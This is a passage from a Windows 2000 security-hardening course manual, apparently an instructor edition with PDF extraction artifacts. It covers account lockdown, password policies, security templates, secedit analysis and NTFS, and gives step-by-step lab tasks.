3. In the Local Policy Setting drop-down list, select Send NTLMv2 ResponseOnly, and click OK.

4. Close the Custom_GPO, saving settings if you are prompted to do so. Ifyou have authentication issues in later tasks, you can return the setting toSend LM And NTLM Responses.

252 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 306: SCNP Hardening

Topic 4CWindows 2000 Security Configuration ToolsIn Windows 2000, you are provided with a variety of tools and resources for theconfiguration and management of security options—for both individual computersand the network itself. These tools include the Security Template Snap-In, theSecurity Configuration and Analysis Snap-In, and Secedit.exe. Secedit.exe is acommand-line tool that can be used, among other things, for analyzing the secu-rity of many computers in a domain.

The Gold StandardWhen configuring Windows 2000 to be a secure operating system, you will havemany choices and configuration options. There are several different templates youcan implement, as you will see shortly. In addition to the templates as providedby Microsoft, there are other standards created by different organizations forsecuring the system. One of these standards is the Gold Standard. The Gold Stan-dard was jointly developed by several organizations, including the NSA andNIST. In this section, you will see references to the Gold Standard, and you willuse the Gold Standard template to check the security of your system against therecommendations.

User and Group SecurityThe focal point of Windows 2000 is just as it was in Windows NT 4.0—theusers. Without users being able to access the network, there is no point in havinga network. The creation of user accounts is something all Windows administratorsmust become familiar with, if they are not already.

There are two basic types of user accounts that can be created in Windows 2000:domain users and local users.

• A domain user account has the ability to log on to the network and accessauthorized resources throughout the domain.

• A local user account has the ability to log on to a specific computer andaccess authorized resources on that computer.

The accounts that exist when a Windows 2000 server is first installed are theGuest and Administrator accounts. Securing the Guest account should happenright away. The same steps that are used to secure the Guest account in WindowsNT 4.0 can be used to secure this account in Windows 2000.

Restricting Logon HoursOnce you have created several user accounts, you should look into restricting thehours in which a user may log on successfully. This is one of the most significantconfigurations in terms of securing user accounts. If your network is to provideaccess only during working hours, there is no reason to allow a user account24x7 access to the network.

Lesson 4: Hardening Windows Computers 253

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 307: SCNP Hardening

Unfortunately, with Windows 2000 Server, restricting logon hours can be doneonly for Domain (AD) users; however, the procedure for doing so is includedhere for your reference.

1. Open the MMC, and add the Active Directory Users And Computers Snap-in.

2. Select the Users folder, and double-click a User object that you want torestrict.

3. In the Properties dialog box, select the Account tab, and click Logon Hours.

4. Specify the necessary time and day restrictions.

5. Click OK to close the Logon Hours dialog box.

6. Click OK to close the User Properties and apply the settings.

Expiration Dates for User AccountsIn addition to setting restrictive hours for a user account, you can control accessto network resources by defining a limit for a user account. In other words, youare creating a user account that will expire.

Again, in Windows 2000 Server, this restriction is available only for Domain(AD) users. Here is the procedure, for your reference.

1. Open the MMC, and add the Active Directory Users And Computers Snap-in.

2. Select the Users folder, and double-click a User object that you want torestrict.

3. In the Properties dialog box, select the Account tab.

4. For the Account Expires option, select the End Of radio button, and enterthe date on which you want the account to expire.

5. Click OK to close the User Properties and apply the changes.

Configuring Windows 2000 GroupsAs you begin working with Windows 2000, you will most likely want to imple-ment and configure a full Active Directory structure, to gain all the benefitsafforded by doing so. However, when you first install a server, it is nothing morethan a stand-alone server—not even part of a domain, let alone a domaincontroller.

After the machine has become a domain controller (you can do this by runningDCPROMO), you will find that, as the administrator, there are several groups foryou to manage. These groups include the Domain Administrators and DomainUsers.

There are two basic group types: a Security group and a Distribution group. TheDistribution group is used to manage lists, such as email lists, and will not bedetailed in this course. We will focus on Security groups. These groups can con-tain users and other security groups, so there is quite a bit of flexibility inmanaging the network.

254 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 308: SCNP Hardening

In Windows NT 4.0, you will recall that groups can be either global or local. InWindows 2000, that concept is expanded. In Windows 2000, the group types are:

• Computer Local—A machine-specific group used to provide access toresources on the local machine only. It cannot be created on a DomainController.

• Domain Local—A group that can have members from any domain in thenetwork. These groups are created only on Domain Controllers, and can beused to provide resource access throughout the domain.

• Global—A group that is used to combine users who often have similar useand access requirements for network resources. Global groups can containmembers from the domain in which the group was created and can be usedto access resources in that domain as well as in other domains.

• Universal—Used in a multidomain environment where groups of users fromdifferent domains have similar resource use and access needs. In order toimplement Universal groups, the network must be running in native mode,meaning only Windows 2000 Domain Controllers are being used. Thisswitch is usually made when all Windows NT 4.0 Domain Controllers havebeen upgraded to Windows 2000.

It is also possible to combine groups together, such as nesting Global groups inUniversal groups, if that is required in your situation. There might be a resourceyou are trying to control access to, and several Global groups might exist that arealready configured with the correct users. In this case, a Universal group willwork for controlling access across the network. You can also place Universalgroups in Domain Local groups and control access to the resource by placingpermissions on the Domain Local group.

These groups are what you will use when controlling access to resources; bothallowing and denying permissions based on your security needs. If you are tryingto secure the computer, user, and network environments, you will use group poli-cies, as introduced earlier.

Locking Down the Administrator AccountThe Administrator account has four significant facts, from a security perspective:

• The name of the built-in administrator account is Administrator.

• This account can, during the installation process, be created with a blankpassword.

• This built-in administrator account is a member of the built-in Administra-tors group.

• The built-in administrator account cannot be locked out.

The chances are extremely high that anyone familiar with the Windows platformalso knows these facts. Therefore, the first priority for you—as an administrator—should be to change the name of the built-in administrator account to somethingthat does not sound so administrative and associate it with a very strongpassword.

Lesson 4: Hardening Windows Computers 255

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 309: SCNP Hardening

You should also prohibit this account from logging on to this computer over thenetwork. This might sound a bit counter-intuitive until you realize that thisaccount will not get locked out, regardless of how strict an account lockoutpolicy you use; for instance, if you implement an account lockout policy thatlocks out a user account after three bad logon attempts, then all accounts otherthan the built-in administrator account will obey this policy.

Now, in most organizations, important machines, such as file, print, authentica-tion, Web, mail, and ftp servers, are typically housed in physically securelocations. Only network administrators are allowed into these areas. (If this is notthe case in your organization, we recommend you start thinking hard about it.) Ifyou can ensure physical security, then the only other way the servers can beattacked is via the network. The most powerful account on a server is the Admin-istrator account. Attacks on an Administrator account can be protected byimplementing a lockout policy—except, of course, the built-in one. Therefore, itis recommended that this account not have the right to log on via the network.

TASK 4C-1Securing Administrator Account Access

Setup: You are logged on to Windows 2000 as Administrator.

1. Right-click My Computer, and choose Manage.

2. In the left pane, expand Local Users And Groups, and select the Usersfolder.

3. In the right pane, right-click the built-in administrator account (calledAdministrator) and choose Rename.

4. For the new account name. enter scnpXXX, where XXX is your seat number,such as L01 or R02.

The last three letters of your computer name should be your seat number. Ifyou are unsure about your computer name, right-click My Computer andchoose Properties, then click Network Identification. Your computer namewill be listed for you. Or, you can open a command prompt and enter theipconfig /all command—your host name is your computer name.

5. Right-click the scnpXXX account and choose Set Password.

6. Enter and confirm aA1234! and click OK twice.

7. In the right pane, right-click anywhere and choose New User.

8. For the new account name, enter Administrator to create a new account thatlooks like it is the built-in administrator account.

9. Enter the password bB5678! and confirm it.

10. Uncheck User Must Change Password At Next Logon.

11. Check User Cannot Change Password and Password Never Expires.Click Create, and then click Close to finish creating the new account.

physical security:The measures used to

provide physical protectionof resources against

deliberate and accidentalthreats.

256 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 310: SCNP Hardening

12. Right-click the new account that you just created, and chooseProperties.

13. Select the Member Of tab.

14. Select the Users group and click Remove.

15. Click Apply, and then click Close.

16. In the right pane, right-click anywhere and choose New User.

17. For the new account name, enter scnpXXXb, and for the password, entercC13579! and confirm it. Again, use your seat number in place of the Xs.

18. Uncheck User Must Change Password At Next Logon.

19. Click Create, and then click Close.

20. Right-click the new account that you just created, and chooseProperties.

21. Select the Member Of tab.

22. Click the Add button, select the Administrators group, click Add, andclick OK.

23. Select the Users group and click Remove.

24. Click Apply, and then click Close.

25. Open the Custom_GPO. If necessary, expand Local Computer Policy,Computer Configuration, Windows Settings, Security Settings, and LocalPolicies. Select User Rights Assignment.

26. In the Right Pane, locate and double-click the policy Deny Access To ThisComputer From The Network.

27. Click Add, then while holding down the Ctrl key, select the useraccounts scnpXXX and Administrator. Click Add.

28. Click OK twice.

29. Double-click the policy Deny Logon Locally.

30. Click the Add button, select the user account Administrator, and clickAdd.

31. Click OK twice.

32. Close all windows. Save settings if you are prompted to do so.

Lesson 4: Hardening Windows Computers 257

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 311: SCNP Hardening

Testing Administrative AccessYou have renamed the built-in administrator account and configured it to be usedonly at the machine and not over the network. You have also created a dummyAdministrator account that cannot log on locally, nor can it be used to access thismachine over the network. And, you have created another administrator account.This is the administrator account that you should use on a day-to-day basis, asand when required; not the built-in account.

Now, let’s test the results of denying network access to this server for the built-inadministrator account. We will create a folder and share it. Then we will config-ure this folder’s share permissions to allow Read access for the built-inadministrator account. Finally, we will test this access from another machine onthe network.

TASK 4C-2Testing Administrative Access

Setup: You are logged on to Windows 2000 as Administrator.

1. Log off and try to log back on as Administrator. You should see a mes-sage stating that the local policy does not permit this account to log on.

2. Try to log on with the renamed Administrator account. This time, youshould be able to log on successfully.

3. On your boot partition, create a folder called Newtest, and within thisfolder, create a text file named doc1.txt. Your boot partition is the partitionthat contains the Windows 2000 OS files.

4. Right-click the new folder, and choose Sharing.

5. Select Share This Folder, and click the Permissions button.

6. Select Everyone and click Remove.

7. Click the Add button, select the user accounts scnpXXX and scnpXXXb,and click Add. Then click OK three times.

8. From your neighbor’s computer, open the Run dialog box. (From theStart menu, choose Run.)

9. Enter \\your_computer’s_IP_address\newtest. You should receive a dialogbox prompting you for a username and password.

10. Enter the name and password for the built-in administrator account.Remember, you changed the built-in administrator account to scnpXXX,with a password of aA1234!.

11. If you are prompted for credentials a second time, enter the sameinformation. You should receive a pop-up error message informing you thata logon failure occurred as the user has not been granted the requested logontype at this computer.

Remember, you set apassword for Administrator:

bB5678!

Remember to include thecomputer name; for instance,

STU-W2K-L01\scnpl01.

258 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 312: SCNP Hardening

12. Click OK to close the error message.

13. This time, try logging on with the credentials for scnpXXXb. You shouldbe successful.

14. Return to your own computer, and close any open windows.

Group PoliciesIn the previous section, you were introduced to Group Policy Objects and theircreation. In this section, you will delve deeper into the usage of the GPO insecuring the network. Two of the issues that must be discussed are the optionsassociated with policy inheritance and overrides.

From the earlier discussion on Group Policy Objects, you should already beaware that the GPOs are implemented in the following order: local GPO, siteGPO, domain GPO, and finally OU GPO. You also are aware of the fact thatwhen there are multiple GPOs assigned to an object, the highest GPO on the listtakes priority over the rest of the list.

You can change the order of implementation on this list by simply choosing aGPO and using the Up and Down buttons to reorder the list to suit your needs.However, you might need to have further control than what the Up and Downbuttons provide to you.

Policy InheritancePolicy inheritance is the name for the process of a user or computer inheriting thefinal policy configuration from multiple policies, depending on where the objectmay be in the Active Directory hierarchy and configured GPOs. To track the poli-cies that might be implemented as a user logs on to a computer, use the followinglist:

1. A computer policy is enabled when the computer is first turned on, and isrefreshed at default intervals.

2. A user policy is applied when a user logs on to the system and is refreshedat default intervals.

3. The local GPO is applied.

4. The site GPO is applied.

5. The domain GPO is applied.

6. The OU GPO is applied.

To keep this complexity in mind, remember that it is not uncommon for sites,domains, and OUs to have more than one GPO configured. It is also not uncom-mon for there to be conflicting settings in locations throughout the policies.

No OverrideOne of the methods for you to manage a GPO implementation is through the NoOverride option. This option is available on any site, domain, or OU GPO. Whenselected, this option means that none of the policy settings in this GPO can beoverridden. In the event that more than one GPO is set to No Override, the high-est GPO takes priority.

Lesson 4: Hardening Windows Computers 259

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 313: SCNP Hardening

Block InheritanceIn addition to the No Override option, you have another choice for managingpolicy implementation. The other choice is called Block Policy Inheritance. Thisoption is also available to any site, domain, or OU GPO. When selected, thisoption means that any policy that is higher will not be inherited, unless they havebeen designated with the No Override option. Enabling this option ensures thatthe settings of the current GPO will be implemented and not the policies of ahigher priority policy.

You must be very careful in the use of the No Override and Block Inheritanceoptions. These choices, used with incomplete planning, can cause serious disrup-tions to the overall policies that are implemented throughout the organization.

Local Security PolicyEach and every Windows 2000 system on the network has what is called a localsecurity policy. The local security policy is the grouping of security configura-tions that affect the local computer. These security configurations can define usersand groups rights and permissions, along with determining machine specific secu-rity settings. In the following tasks, you will configure local security policysettings.

TASK 4C-3Verifying Password Requirements

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Open the Computer Management (Local) console.

2. Create three users named poluser1, poluser2, and poluser3.

3. Leave this console open.

4. From the Start menu, choose Programs→Administrative Tools→LocalSecurity Policy.

5. Expand Account Policies, and select Password Policy.

6. In the right pane, double-click the Minimum Password Length policy.

7. Change the value for Password Must Be At Least to 4 characters, andclick OK.

8. Leave the Local Security Settings MMC open.

9. Switch to the Computer Management (Local) console.

10. Right-click poluser1, and choose Set Password.

11. Enter 123 as the password, and confirm it.

260 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 314: SCNP Hardening

12. Click OK. You should be presented with a pop-up warning informing youthat an error occurred while attempting to set the password for that user. Thenew password (123) does not meet the password policy requirements.

13. Click OK to close the warning, and then set poluser1’s password as 1234as the password. The password should now be accepted. Click OK.

14. Switch to the Local Security Settings MMC.

15. Double-click the Passwords Must Meet Complexity Requirements policy.

16. Change the setting for this policy to Enabled, and click OK.

17. Switch to the Computer Management MMC.

18. Right-click poluser2, and set the password as 1234.

19. Click OK. You should be presented with a pop-up warning informing youthat an error occurred while attempting to set the password for that user. Thenew password (1234) does not meet the password policy requirements.

20. Click OK to close the warning, and then try setting the password as a123.

21. Click OK. You should again be presented with a pop-up warning informingyou that an error occurred while attempting to set the password for that user.The new password (a123) still does not meet the password policyrequirements. Let’s try again.

22. Click OK to close the warning, and then try using aA12 as the password.

23. Click OK. This time, the password should be accepted.

24. Click OK, and close all open windows.

Password RecommendationsIn order to create a solid password, you should include a combination of alphanu-meric characters, provided that the combination includes both upper- and lower-case letters, which will satisfy complexity requirements as stipulated byMicrosoft’s policy designers. Interestingly, if you search for the definition for thispolicy in Microsoft’s TechNet, you will be provided information similar to whatis shown in Figure 4-8.

Lesson 4: Hardening Windows Computers 261

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 315: SCNP Hardening

Figure 4-8: A TechNet description of password complexity requirements.

This means that simply turning this policy on will not force users to use at least asix-character password. You have already proved this. Nor do you have to enterany of the non-alphanumeric characters. You can get away with using upper- andlower-case alphanumeric characters.

Security TemplatesThe prospect of configuring all the options in the GPO can be quite overwhelm-ing at times. To help with defining how the security should be configured forgiven situations, Microsoft has included security templates that can be used in theGroup Policy Editor.

These templates are INF files and can be opened with a text editor for viewing.Templates are stored in the %systemroot%\security\templates folder. Templatescan be applied to a GPO, and any user or computer that is controlled by thatGPO will be affected by the settings in the security template.

Each template itself is a set of pre-configured options that are to be used for agiven scenario. Microsoft has included a full set of templates designed to covermost of the standard scenarios that can come up. You can use the templates as-is,or modify them to suit your needs. In addition to modifying a template, you canalso create new templates from scratch, so that they are fully customized for yoursituation.

262 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 316: SCNP Hardening

Predefined Security TemplatesSome of the common security templates that are built into the system are:

• BASICDC.INF—This template configures default Domain Controller secu-rity settings.

• BASICSV.INF—This template configures default server security settings.

• BASICWK.INF—This template configures default workstation securitysettings.

• COMPATWS.INF—This template configures compatible workstation orserver security settings.

• SECUREWS.INF—This template configures secure workstation securitysettings.

• HISEDC.INF—This template configures highly secure Domain Controllersecurity settings.

• HISECWS.INF—This template configures highly secure workstation securitysettings.

• SETUP SECURITY.INF—This template configures out-of-the-box defaultsecurity settings.

As you can see, there are several general security levels in the templates: basic,compatible, secure, and highly secure. The following defines the general purposeand function of each of the security levels.

• The basic templates (BASIC*.INF) allow for an administrator to reverse anearlier implementation of a security configuration. The basic templates arenot designed as a complete reversal of security configurations on a system,however. These templates configure Windows 2000 security settings that arenot related to user rights.

• The compatible templates (COMPAT*.INF) are often run only in mixedenvironments, where Windows NT 4.0 machines are present. These templatesconfigure the system so that local Power Users have security settings that arecompatible with Windows NT 4.0 users.

• The secure templates (SECURE*.INF) configure security settings for theentire system, but not on files, folders, and Registry keys. Those areas arenot addressed in these templates due to the default security that is in placefor those objects.

• The highly secure templates (HISEC*.INF) are used to secure network com-munications on Windows 2000 computers. These templates allow for thehighest level of protection on traffic sent to and from Windows 2000machines. As such, these templates require that a computer configured to usea HISEC template can communicate only with other Windows 2000computers.

Another type of preconfigured template is the Dedicated Domain Controller(DEDICADC.INF). This template is used to secure a machine running as aDomain Controller, as the name implies. The reason you might want to imple-ment this template is that, by default, the security on a DC is designed to allowfor legacy applications, so it is not as secure as it could be. If your DC is notrequired to run any of these programs, it is suggested that the Dedicated DC tem-plate be implemented.

Common SecurityTemplates

security level:The combination of ahierarchical classificationand a set of non-hierarchicalcategories that represents thesensitivity of information.

Lesson 4: Hardening Windows Computers 263

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 317: SCNP Hardening

Another predefined template is one that is very important in the world today, butis not included with the other preconfigured templates—the HISECWEB.INFtemplate. This template is designed to configure an IIS 5.0 machine running theHTTP service. Although it is not in the list of default templates, this template canbe found and downloaded for free, directly from Microsoft, at http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316347&, which is theURL for the Microsoft article “IIS 5: HiSecWeb Potential Risks and the IISLockdown Tool (Q316347).” The implementation of the HISECWEB.INF tem-plate is a requirement for any IIS 5.0 Web server that you need to have lockeddown.

TASK 4C-4Analyzing Default Password Settings of SecurityTemplates

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Open an empty MMC.

2. Choose Console→Add/Remove Snap-ins.

3. Add the Security Templates Snap-In.

4. Expand and review the password policies for Basicsv, Hisecdc, andSecuredc. Observe the password definitions of each template.

5. Leave the MMC open for the next task.

Custom Security TemplatesAs you can see from this short example, the templates provide a range of config-ured settings. In this case, the passwords are managed differently based onsituation. In the event that a security template does not quite fit your needs, youcan modify the settings. If your needs are such that you would need to modify agreat deal of the template, it might be easier to simply create a new templatealtogether.

TASK 4C-5Creating a Custom Security Template

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account. The MMC is open, and the Security Templatessnap-in has been added.

1. If necessary, expand the Security Templates to reveal all of the templates.

2. Right-click the directory location of the templates (such as C:\WINNT\Security\Templates), and choose New Template.

264 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 318: SCNP Hardening

3. Name your template Custom Password Config.

4. Use the Description Template specifying highly secure passwords.

5. Click OK to create a blank template.

6. Configure your template to use the following settings:

a. Enforce Password History: 24 Passwords

b. Maximum Password Age: 20 days (accept the suggested value for Mini-mum Password Age)

c. Minimum Password Age: 5 days

d. Minimum Password Length: 14 characters

e. Account Lockout Duration: 0 minutes (accept the suggested settings)

f. Account Lockout Threshold: 3 invalid logon attempts

g. Reset Account Lockout Counter After: 120 minutes

7. Right-click the new template, and choose Save.

8. Leave the MMC open for the next task.

Security Configuration and Analysis Snap-InOnce you have created a policy, or made some changes to a predefined template,you will likely want to apply this template to the network. As mentioned earlier,templates can be applied (or imported) to GPOs. Importing a template to a GPOis a straightforward procedure and uses a tool called Security Configuration andAnalysis Snap-In.

Another of the advances in security management provided by Windows 2000 isthe Security Configuration and Analysis Snap-In of the MMC. With this tool, youcan implement templates and configure the security of your system. In addition toimplementation, this tool allows for a complete security analysis of the operatingsystem.

This tool takes the security settings of a template and compares the settings to thecurrent configuration of the operating system. During this analysis, it will differ-entiate between those items that are in compliance and those items that are not incompliance. Items that are in compliance with the settings are highlighted with agreen check mark, and items that are not in compliance are highlighted with a redX.

Lesson 4: Hardening Windows Computers 265

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 319: SCNP Hardening

TASK 4C-6Investigating the Security Configuration and AnalysisSnap-In

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account. The MMC is open, and the Security Templatessnap-in has been added.

1. Add the Security Configuration and Analysis Snap-In to the MMC.

2. Right-click the Security Configuration and Analysis Snap-In and chooseOpen Database.

3. For the Filename, enter Password_Check.sdb, and click Open. Becausethere is no New option, this step creates the new file.

4. From the template list, select your Custom Password Config template, andclick Open.

5. Right-click the Security Configuration and Analysis Snap-In and chooseAnalyze Computer Now. Accept the default path for error log messages,and click OK.

6. Once the analysis is finished, expand the Security Configuration andAnalysis Snap-In, and examine whether or not your system is up topolicy in regards to passwords.

7. Leave the MMC and snap-in open for the next task.

Template ImplementationOnce you have a configuration you are ready to implement, you can do so byusing the Security Configuration and Analysis tool as well. Be aware that whenmaking changes such as a template implementation, this can take a bit of time.However, the process of template implementation is quite straightforward.

There are two general timers associated with policy implementation. By default:

• Group policies that have been implemented for computers will get refreshedevery 90 minutes.

• Group policies that have been implemented for domain controllers will getrefreshed every five minutes.

266 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 320: SCNP Hardening

TASK 4C-7Implementing the Template

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account. The MMC is open, and the Security Templatessnap-in has been added, as well as the Security Configurationand Analysis snap-in.

1. Right-click the Security Configuration and Analysis Snap-In, and chooseConfigure Computer Now.

2. Keep the default location for error logs, and click OK. It will take severalminutes to apply the template. There will be no message on-screen once ithas been implemented; you will be at the MMC.

3. Run the analysis again to confirm the configuration has taken place.

4. Close the MMC without saving changes.

The secedit.exe UtilityAlthough the graphical tools are excellent methods of implementation and analy-sis, there are some command-line functions that can also be used to increase thesecurity of the local machine and the network. Specifically discussed in this sec-tion is the tool secedit.exe.

Secedit.exe is a command-line tool that can be used to create and apply securitytemplates and can analyze system security configurations. This can be a usefulalternative to the GUI tools for checking multiple computers or for schedulinganalysis sessions. You could use secedit.exe to analyze all your servers every Fri-day night, for example.

TASK 4C-8Analyzing the Current Security Settings of the LocalSystem

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Open a command prompt and enter secedit /export /CFG C:\secfile.txt torun the secedit.exe tool, indicating that the output should be placed in thesecfile.txt file.

2. Allow the command to complete running.

3. Open the Secfile.txt document with Notepad.

Make sure that you include aspace before each forwardslash (/).

Lesson 4: Hardening Windows Computers 267

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 321: SCNP Hardening

4. Observe the current security settings, including the Password and Audit-ing Settings.

5. Close Notepad and the command prompt.

Analyzing and Implementing the Gold StandardIn order to enforce a strong password culture in your organization, you have toturn on appropriate variables in more than one policy setting—that is, you mighthave to tinker with all of the policies under Security Settings, Account Policies,Password Policy. In fact, to tighten up the machine, you have to implementchanges to many other policies. You can do this manually, or you can configuresecurity policies to certain standards recommended by people or organizationswho have studied these options well, such as the Gold Standard from NIST.

The six password policies, along with the Windows defaults and the Gold Stan-dard recommendations, are:

• Enforce Password History—This policy determines how many uniquechanges to a password a user can come up with before being able to reuseone. The Windows default is 0; the Gold Standard recommendation is 24.

• Maximum Password Age—This policy determines how long a user can usethe same password before being forced to change it. The Windows default is42 days; the Gold Standard recommendation is 90 days.

• Minimum Password Age—This policy determines how long a user must usea password before being able to change it. This option is there to preventusers from cycling through a list of passwords in quick succession so thatthey can go back to their favorite password. The Windows default is 0 days;the Gold Standard recommendation is 1 day.

• Minimum Password Length—This policy determines how many charactersthere should be in a password. The Windows default is 0; the Gold Standardrecommendation is 8.

• Passwords Must Meet Complexity Requirements—This policy determineswhat combination of characters should be used in a password. The Windowsdefault is Disabled; in the Gold Standard, it is Enabled.

• Store Password Using Reversible Encryption For All Users In TheDomain—This policy takes a bit of explaining. Even though it is a high-sounding policy, in essence, if you enable this option, passwords will bestored as plaintext. Seems a bit silly in this day and age to do something likethat, doesn’t it? So why have this option at all? Well, there are certain appli-cations that use protocols that require knowledge of a user’s password inorder to carry out specific authentication functions, such as when usingCHAP authentication through RADIUS—in such cases, the system needs theplaintext password to generate a digest. The default is Disabled, the GoldStandard is also to leave it Disabled. In fact, it is recommended to NEVERenable this option unless absolutely required and you know what you aredoing, and are aware of the consequences.

Comparing WindowsDefaults to the GoldStandard (2 slides)

268 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 322: SCNP Hardening

TASK 4C-9Configuring Policies to the Gold Standard

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. From Administrative Tools, open the Local Security Policy.

2. Expand Account Policies, and select Password Policy.

3. In the right pane, verify that the Enforce Password History policy is setto Keep Password History For 24 Passwords Remembered.

4. Double-click the Maximum Password Age policy.

5. Change the value for Passwords Expire In to 90 days, and click OK.

6. Double-click the Minimum Password Age policy.

7. Change the value to Password Can Be Changed After 1 day, and clickOK.

8. Double-click the Minimum Password Length policy.

9. Change the value for Password Must Be At Least to 8 characters, andclick OK.

10. Observe the Passwords Must Meet Complexity Requirements policy. Youhave already enabled this policy, so you can skip it here.

11. Observe the Store Password Using Reversible Encryption For All UsersIn The Domain policy. This policy should remain disabled, so you can skipthis, too.

12. Close all open windows.

Analyzing the Gold StandardYou now have set the appropriate values for the password policies to meet theNSA/NIST’s Gold Standard. Of course, this does not mean that your machine isnow operating at Gold Standard levels. There are nearly a hundred such policiesand many other Registry entries that can be configured with the template for theGold Standard.

Instead of configuring each policy one at a time, such as you did in the previoustask, there is a template for meeting the Gold Standard provided on the data diskfor you to use. The name of the file is NIST2kws.inf.

As an administrator, you may or may not agree with the settings provided to youin a template. Some template settings may be too strict, while others may be toolax. It is up to you to decide that. The Gold Standard is only a recommendationfor a secure desktop environment. It may or may not work for your organization.

Lesson 4: Hardening Windows Computers 269

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 323: SCNP Hardening

If you want, you can tinker with the settings and create your own template. Onceyou are satisfied with a template, you can configure the computer to match thesesettings. In a domain environment, remember that you also have the advantage ofimplementing group policies for the entire domain or an OU within a domain.

TASK 4C-10Analyzing the Gold Standard

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Copy the Gold Standard template file NIST2kws.inf from your data diskto your WINNT\security\templates folder.

2. Start the MMC, and add the Security Configuration And Analysis snap-in.

3. In the left pane, select Security Configuration And Analysis.

4. Read the instructions displayed in the right pane. Because we do nothave an existing database, we will follow the instructions to create a newdatabase.

5. Right-click Security Configuration And Analysis, and choose OpenDatabase.

6. Name the new database goldpol, and click Open.

7. In the Import Template dialog box, select the NIST2kws.inf template andclick Open.

8. Again, read the instructions displayed in the right pane. We do not wantto configure the computer. We only want to analyze our computer’s securitysettings against this template.

9. Right-click Security Configuration And Analysis, and choose AnalyzeComputer Now.

10. Accept the location of the error log file path, and wait a few seconds forthe analysis to proceed. Your computer’s security settings are being com-pared to the settings in the Gold Standard template.

11. When the analysis is complete, observe the security areas listed below themain scope.

12. Expand Account Policies, and select Password Policy. In the right pane,you should see three columns of information.

The first column is the policy, the second column is the setting as specifiedin the template (which, in this case, is NIST’s Gold Standard), and the thirdcolumn shows your computer’s present setting.

270 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 324: SCNP Hardening

13. On each policy in the first column, verify that you see a green checkmark. This means that your computer’s setting for that policy matches thetemplate it’s being compared against. In the case of the password policies,you have already taken care of each setting manually to comply with theGold Standard; therefore, all six policies listed here have a green checkmark.

14. In the left pane, select Account Lockout Policy.

15. Observe the right pane. One of the policies—Account LockoutThreshold—has a green check mark, while the other two policies show a redX, signifying that the computer’s setting is different from the template.

16. In the left pane, expand Local Policies.

17. Select Audit Policy, User Rights Assignment, and Security Options. Ineach case, observe the various policies in the right pane that are notconsistent with the template.

18. In the left pane, select Restricted Groups.

19. Observe the right pane. Only one group—the Power Users group—has agreen check mark. When an item has neither a green check mark nor a redX, this means that this item was not included in the template to be comparedwith.

20. Double-click the Power Users group. Observe that, according to the tem-plate, this group should have no members within it, nor should thisgroup be nested within some other group. Click Cancel.

21. In the left pane, select System Services, and observe the number of incon-sistencies displayed in the right pane.

22. Double-click any inconsistent setting and any consistent setting, andcompare the two settings.

23. In the left pane, select Registry, and observe the number of inconsisten-cies displayed in the right pane.

24. Double-click any inconsistent setting and any consistent setting, andcompare the two settings.

25. In the left pane, select File System, and observe the number of inconsis-tencies displayed in the right pane.

26. Double-click any inconsistent setting and any consistent setting, andcompare the two settings.

27. Close all open windows without saving any changes.

Lesson 4: Hardening Windows Computers 271

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 325: SCNP Hardening

Topic 4DWindows 2000 Resource SecurityMany resources are available on a Windows 2000 server and network, all ofwhich need to be secured in some manner. Let’s start with the file system.

File and Folder SecurityWhile Windows NT 4.0 had the ability to work with only FAT and NTFS filesystems, Windows 2000 can also work with FAT32. And, even though Windows2000 can support FAT and FAT32, it is still recommended that NTFS be used forits security options.

The use of NTFS in Windows 2000, technically called NTFS version 5, isrequired if an administrator wants to use Active Directory, domains, and theadvanced file security that is provided. Additionally, the addition of file encryp-tion and disk quotas require NTFS. It is strongly recommended that all partitionsthat are still running FAT or FAT32 be converted to NTFS in order to effectivelysecure Windows 2000 resources. If you need to convert a partition to NTFS, youcan use the command convert c: /FS:NTFS, where c is the file partition tobe converted.

Any new partition either created or converted to NTFS will, by default, allow theEveryone group Full Control access. You will soon begin to see some significantchanges in this regard with the Windows Server 2003 (.NET) servers, though.Because this group includes the Guest and Anonymous accounts, strict securitymust be implemented before you allow any user accounts to access the system orto be added.

